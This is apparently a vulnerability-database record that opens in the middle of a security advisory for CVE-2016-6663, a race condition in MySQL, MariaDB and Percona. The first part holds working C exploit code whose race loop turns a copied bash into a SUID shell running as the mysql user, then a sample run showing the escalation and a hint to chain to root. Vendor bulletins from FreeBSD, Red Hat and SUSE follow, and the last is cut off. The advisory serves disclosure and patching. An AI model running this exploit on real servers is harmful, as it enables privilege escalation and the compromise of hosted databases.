\"/tmp/\" EXP_DIRN); \numask(000); \nsystem(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN); \nsystem(\"chmod g+s /tmp/\" EXP_DIRN ); \n \n// Prepare exploit tables :) \nprintf(\"\\n[+] Creating mysql tables \\n\\n\"); \nmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 0); \nmysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0); 
\nmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0); \nmysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0); \n \n// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file \n// The file should be owned by mysql:attacker thanks to the sticky bit on the table directory \nprintf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\"); \nsystem(\"cp /bin/bash \" SUID_SHELL); \nsystem(\"ls -l \" SUID_SHELL); \n \n// Use inotify to get the timing right \nfd = inotify_init(); \nif (fd < 0) { \nprintf(\"failed to inotify_init\\n\"); \nreturn -1; \n} \nret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); \n \n \n/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ \n \nprintf(\"\\n[+] Entering the race loop... Hang in there...\\n\"); \n \nwhile ( is_shell_suid != 1 ) { \n \ncnt++; \nif ( (cnt % 100) == 0 ) { \nprintf(\"->\"); \n//fflush(stdout); \n} \n \n/* Create empty file , remove if already exists */ \nunlink(MYSQL_TEMP_FILE); \nunlink(MYSQL_TAB_FILE); \nmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1); \nmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1); \n \n/* random num if needed */ \nsrand ( time(NULL) ); \nrandomnum = ( rand() % MAX_DELAY ); \n \n// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink \npid = fork(); \nif (pid < 0) { \nfprintf(stderr, \"Fork failed :(\\n\"); \n} \n \n/* Child process - executes REPAIR TABLE SQL statement */ \nif (pid == 0) { \nusleep(500); \nunlink(MYSQL_TEMP_FILE); \nmysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1); \n// child stops here \nexit(0); \n} \n \n/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ 
\nif (pid > 0 ) { \nio_notified = 0; \n \nwhile (1) { \nint processed = 0; \nret = read(fd, buf, sizeof(buf)); \nif (ret < 0) { \nbreak; \n} \nwhile (processed < ret) { \nevent = (struct inotify_event *)(buf + processed); \nif (event->mask & IN_CLOSE) { \nif (!strcmp(event->name, \"exploit_table.TMD\")) { \n//usleep(randomnum); \n \n// Set the .MYD permissions to suid+exec before they get copied to the .TMD file \nunlink(MYSQL_TAB_FILE); \nmyd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); \nclose(myd_handle); \nchmod(MYSQL_TAB_FILE, 04777); \n \n// Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec \nunlink(MYSQL_TEMP_FILE); \nsymlink(SUID_SHELL, MYSQL_TEMP_FILE); \nio_notified=1; \n} \n} \nprocessed += sizeof(struct inotify_event); \n} \nif (io_notified) { \nbreak; \n} \n} \n \n \nwaitpid(pid, &status, 0); \n} \n \n// Check if SUID bit was set at the end of this attempt \nif ( lstat(SUID_SHELL, &st) == 0 ) { \nif (st.st_mode & S_ISUID) { \nis_shell_suid = 1; \n} \n} \n \n} \n \nprintf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) !\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt); \nsystem(\"ls -l \" SUID_SHELL); \n \nprintf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\"); \nsystem(SUID_SHELL \" -p -i \"); \n//system(SUID_SHELL \" -p -c '/bin/bash -i -p'\"); \n \n/* close MySQL connection and exit */ \nprintf(\"\\n[+] Job done. Exiting\\n\\n\"); \nmysql_close(conn); \nreturn 0; \n \n} \n \n \n------------------[ EOF ]-------------------- \n \n \n \nExample run: \n~~~~~~~~~~~~~ \n \nattacker@xenial:~/mysql-exploit$ lsb_release -a \nNo LSB modules are available. 
\nDistributor ID: Ubuntu \nDescription: Ubuntu 16.04.1 LTS \nRelease: 16.04 \nCodename: xenial \n \nattacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv \nii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version) \nii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries \nii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files \n \nattacker@xenial:~/mysql-exploit$ id \nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker) \n \nattacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;' \n+-----------------------------------------------------------------------------------------------------------------+ \n| Grants for attacker@localhost | \n+-----------------------------------------------------------------------------------------------------------------+ \n| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' | \n| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' | \n+-----------------------------------------------------------------------------------------------------------------+ \n \nattacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.* \nls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied \n \nattacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb \n \nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit \nmysql-privesc-race.c (ver. 1.0) \n \nCVE-2016-6663 / OCVE-2016-5616 \n \nFor testing purposes only. Do no harm. 
\n \nDiscovered/Coded by: \n \nDawid Golunski \nhttp://legalhackers.com \n \n \n[+] Starting the exploit as: \nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker) \n \n[+] Connecting to the database `pocdb` as attacker@localhost \n \n[+] Creating exploit temp directory /tmp/mysql_privesc_exploit \n \n[+] Creating mysql tables \n \nDROP TABLE IF EXISTS exploit_table \nDROP TABLE IF EXISTS mysql_suid_shell \nCREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \nCREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \n \n[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : \n-rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD \n \n[+] Entering the race loop... Hang in there... \n \n \n[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: \n \n-rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD \n \n[+] Spawning the mysql SUID shell now... \nRemember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) \n \nmysql_suid_shell.MYD-4.3$ whoami \nmysql \nmysql_suid_shell.MYD-4.3$ id \nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) \nmysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.* \n-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm \n-rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD \n-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI \nmysql_suid_shell.MYD-4.3$ exit \nexit \n \n[+] Job done. Exiting \n \n \nreal 0m28.999s \nuser 0m0.016s \nsys 0m0.016s \n \n \n \n \nVideo PoC: \n~~~~~~~~~~~ \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \n \n \nVI. 
BUSINESS IMPACT \n------------------------- \n \nMalicious local users with DB access granted a common set of privileges \n(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary \ncode and escalate their privileges to mysql system user. This would allow them \nto gain access to all of the databases stored on the server as well as exploit \nCVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges \nto root system user (rootshell) and fully compromise the target server. \n \nThis vulnerability could for example be exploited by malicious users in a shared \nhosting environment where each user is supposed to have access to only one \ndatabase assigned to them. \nIt could also be exploited by attackers who have managed to find a vulnerability \nin a website and gained access to the target system as a low-privileged user \n(such as apache/www-data). \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nMariaDB \n< 5.5.52 \n< 10.1.18 \n< 10.0.28 \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \n \n \nWhen checking if your system contains the patches, note that this vulnerability \nhas been known under two CVE IDs: \n \nCVE-2016-6663 \nCVE-2016-5616 \n \nCVE-2016-6663 is the original CVE that was agreed to be used by all the \naffected vendors. \nThe issue was however mentioned in Oracle CPU mistakenly under a new CVE of \nCVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be \nupdated to state that CVE-2016-5616 is equivalent to CVE-2016-6663. \n \n \nVIII. SOLUTION \n------------------------- \n \nMariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in \nadvance which allowed them to produce patches for this vulnerability before \ndisclosure. \n \nUpdate to security releases issued by the vendor. 
\n \nAs a temporary mitigation, you can disable symbolic link support in the \ndatabase server configuration with the following my.cnf config setting: \n \nsymbolic-links = 0 \n \nNevertheless, an update to a patched release is recommended. \n \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nThis advisory (CVE-2016-6663 / OCVE-2016-5616): \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html \n \nExploit (mysql-privesc-race.c) source code URL: \nhttp://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c \n \nVideo PoC: \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \nAdvisory for CVE-2016-6664 / OCVE-2016-5617: \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \n \nVendor updates: \n \nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL \nhttp://www.mysql.com/ \n \nhttps://mariadb.org/about/ \nhttps://mariadb.com/kb/en/mdb-5552-rn/ \nhttps://mariadb.com/kb/en/mdb-10118-rn/ \nhttps://mariadb.com/kb/en/mdb-10028-rn/ \n \nhttps://www.percona.com/software \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \n \nhttp://legalhackers.com \n \n \nXI. REVISION HISTORY \n------------------------- \n \n01.11.2016 - Advisory released \n \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. 
\n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139476/db-escalate.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "description": "\nThe MySQL project reports:\n\n\nCVE-2016-3492: Remote security vulnerability in 'Server: Optimizer'\n\t sub component.\nCVE-2016-5616, CVE-2016-6663: Race condition allows local users with\n\t certain permissions to gain privileges by leveraging use of my_copystat\n\t by REPAIR TABLE to repair a MyISAM table.\nCVE-2016-5617, CVE-2016-6664: mysqld_safe, when using file-based\n\t logging, allows local users with access to the mysql account to gain\n\t root privileges via a symlink attack on error logs and possibly other\n\t files.\nCVE-2016-5624: Remote security vulnerability in 'Server: DML' sub\n\t component.\nCVE-2016-5626: Remote security vulnerability in 'Server: GIS' sub\n\t component.\nCVE-2016-5629: Remote security vulnerability in 'Server: Federated'\n\t sub component.\nCVE-2016-8283: Remote security vulnerability in 'Server: Types' sub\n\t component.\n\n\n", "edition": 4, "modified": "2016-09-13T00:00:00", "published": "2016-09-13T00:00:00", "id": "22373C43-D728-11E6-A9A5-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/22373c43-d728-11e6-a9a5-b499baebfeaf.html", "title": "MySQL -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:57", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3492", "CVE-2016-5507", "CVE-2016-5616", "CVE-2016-5617", "CVE-2016-5626", "CVE-2016-5629", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-8283"], "description": "MySQL is a multi-user, multi-threaded 
SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: rh-mysql56-mysql (5.6.34).\n\nSecurity Fix(es):\n\n* It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662)\n\n* A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616)\n\n* A flaw was found in the way the mysqld_safe script handled creation of the error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-6664, CVE-2016-5617)\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. (CVE-2016-3492, CVE-2016-5507, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283)", "modified": "2018-06-13T01:28:25", "published": "2016-11-15T16:05:56", "id": "RHSA-2016:2749", "href": "https://access.redhat.com/errata/RHSA-2016:2749", "type": "redhat", "title": "(RHSA-2016:2749) Important: rh-mysql56-mysql security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3492", "CVE-2016-5612", "CVE-2016-5616", "CVE-2016-5617", "CVE-2016-5624", "CVE-2016-5626", "CVE-2016-5629", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-8283"], "description": "MySQL is a multi-user, multi-threaded SQL database server. 
It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: mysql55-mysql (5.5.52).\n\nSecurity Fix(es):\n\n* It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662)\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5617, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283)", "modified": "2018-06-13T01:28:24", "published": "2016-10-31T23:33:48", "id": "RHSA-2016:2130", "href": "https://access.redhat.com/errata/RHSA-2016:2130", "type": "redhat", "title": "(RHSA-2016:2130) Important: mysql55-mysql security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5483", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3651"], "description": "MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)\n\nSecurity Fix(es):\n\n* It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. 
A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring a database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\n* A flaw was found in the way the mysqld_safe script handled creation of the error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\n* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\n* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\n* Multiple flaws were found in the way the mysqld_safe script handled creation of the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\n* A flaw was found in the way the MySQL client library (libmysqlclient) handled prepared statements when the server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. 
(CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:33:35", "published": "2017-08-01T09:58:44", "id": "RHSA-2017:2192", "href": "https://access.redhat.com/errata/RHSA-2017:2192", "type": "redhat", "title": "(RHSA-2017:2192) Moderate: mariadb security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5617", "CVE-2016-6664", "CVE-2017-10268", "CVE-2017-10286", "CVE-2017-10378", "CVE-2017-10379", "CVE-2017-10384", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3636", "CVE-2017-3641", "CVE-2017-3653"], "description": "MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: rh-mariadb101-mariadb (10.1.29). 
(BZ#1463417, BZ#1517327)\n\nSecurity Fix(es):\n\n* mysql: insecure error log file handling in mysqld_safe (CPU Oct 2016) (CVE-2016-5617, CVE-2016-6664)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017) (CVE-2017-3238)\n\n* mysql: Server: Charsets unspecified vulnerability (CPU Jan 2017) (CVE-2017-3243)\n\n* mysql: Server: DML unspecified vulnerability (CPU Jan 2017) (CVE-2017-3244)\n\n* mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017) (CVE-2017-3257)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) (CVE-2017-3258)\n\n* mysql: unsafe chmod/chown use in init script (CPU Jan 2017) (CVE-2017-3265)\n\n* mysql: unrestricted mysqld_safe's ledir (CPU Jan 2017) (CVE-2017-3291)\n\n* mysql: Server: DML unspecified vulnerability (CPU Apr 2017) (CVE-2017-3308)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) (CVE-2017-3309)\n\n* mysql: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 fix (CPU Jan 2017) (CVE-2017-3312)\n\n* mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017) (CVE-2017-3313)\n\n* mysql: Logging unspecified vulnerability (CPU Jan 2017) (CVE-2017-3317)\n\n* mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017) (CVE-2017-3318)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) (CVE-2017-3453)\n\n* mysql: Server: DML unspecified vulnerability (CPU Apr 2017) (CVE-2017-3456)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Apr 2017) (CVE-2017-3464)\n\n* mysql: Client programs unspecified vulnerability (CPU Jul 2017) (CVE-2017-3636)\n\n* mysql: Server: DML unspecified vulnerability (CPU Jul 2017) (CVE-2017-3641)\n\n* mysql: Server: Replication unspecified vulnerability (CPU Oct 2017) (CVE-2017-10268)\n\n* mysql: Server: InnoDB unspecified vulnerability (CPU Oct 2017) (CVE-2017-10286)\n\n* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017) (CVE-2017-10378)\n\n* mysql: Client programs unspecified 
vulnerability (CPU Oct 2017) (CVE-2017-10379)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Oct 2017) (CVE-2017-10384)\n\n* mysql: prepared statement handle use-after-free after disconnect (CVE-2017-3302)\n\n* mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) (CVE-2017-3653)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, a syntax error in the Galera Arbitrator SysV init script prevented the garbd daemon from being started when the SysV init script was used. With this update, the definition of the main daemon binary in the SysV init script has been fixed, and the described problem no longer occurs. (BZ#1466473)\n\n* Prior to this update, the scl macros were not set for the rh-mariadb101-mariadb@.service file, which consequently made the service file unusable. This bug has been fixed, and rh-mariadb101-mariadb@.service now works as expected. 
(BZ#1485995)", "modified": "2018-06-13T01:28:22", "published": "2018-03-21T17:36:47", "id": "RHSA-2018:0574", "href": "https://access.redhat.com/errata/RHSA-2018:0574", "type": "redhat", "title": "(RHSA-2018:0574) Moderate: rh-mariadb101-mariadb and rh-mariadb101-galera security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5617", "CVE-2016-6664", "CVE-2017-10268", "CVE-2017-10286", "CVE-2017-10378", "CVE-2017-10379", "CVE-2017-10384", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3636", "CVE-2017-3641", "CVE-2017-3653"], "description": "MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: rh-mariadb100-mariadb (10.0.33).\n\nSecurity Fix(es):\n\n* A flaw was found in the way the mysqld_safe script handled creation of the error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\n* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\n* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. 
(CVE-2017-3291)\n\n* Multiple flaws were found in the way the mysqld_safe script handled creation of the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\n* A flaw was found in the way the MySQL client library (libmysqlclient) handled prepared statements when the server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3257, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464, CVE-2017-3636, CVE-2017-3641, CVE-2017-3653, CVE-2017-10268, CVE-2017-10286, CVE-2017-10378, CVE-2017-10379, CVE-2017-10384)", "modified": "2018-06-13T01:28:16", "published": "2018-02-06T15:37:36", "id": "RHSA-2018:0279", "href": "https://access.redhat.com/errata/RHSA-2018:0279", "type": "redhat", "title": "(RHSA-2018:0279) Moderate: rh-mariadb100-mariadb security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-02-17T05:00:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "This mariadb version update to 10.0.29 fixes the following issues:\n\n - CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - 
CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)\n - CVE-2017-3244: unspecified vulnerability affecting the DML component\n (bsc#1020877)\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n * XtraDB updated to 5.6.34-79.1\n * TokuDB updated to 5.6.34-79.1\n * Innodb updated to 5.6.35\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog:\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-release-notes\">https://kb.askmonty.org/en/mariadb-10029-release-notes</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-changelog\">https://kb.askmonty.org/en/mariadb-10029-changelog</a>\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "modified": "2017-02-17T04:16:24", "published": "2017-02-17T04:16:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00027.html", "id": "OPENSUSE-SU-2017:0486-1", "title": "Security update for mariadb (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-07T00:59:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3258"], "edition": 1, "description": 
"This mysql version update to 5.5.54 fixes the following issues:\n\n - CVE-2017-3318: Unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n - CVE-2017-3317: Unspecified vulnerability affecting Logging (bsc#1020894)\n - CVE-2017-3313: Unspecified vulnerability affecting the MyISAM component\n (bsc#1020890)\n - CVE-2017-3312: Insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n - CVE-2017-3291: Unrestricted mysqld_safe's ledir (bsc#1020884)\n - CVE-2017-3265: Unsafe chmod/chown use in init script (bsc#1020885)\n - CVE-2017-3258: Unspecified vulnerability in the DDL component\n (bsc#1020875)\n - CVE-2017-3244: Unspecified vulnerability affecting the DML component\n (bsc#1020877)\n - CVE-2017-3243: Unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: Unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n Release Notes:\n <a 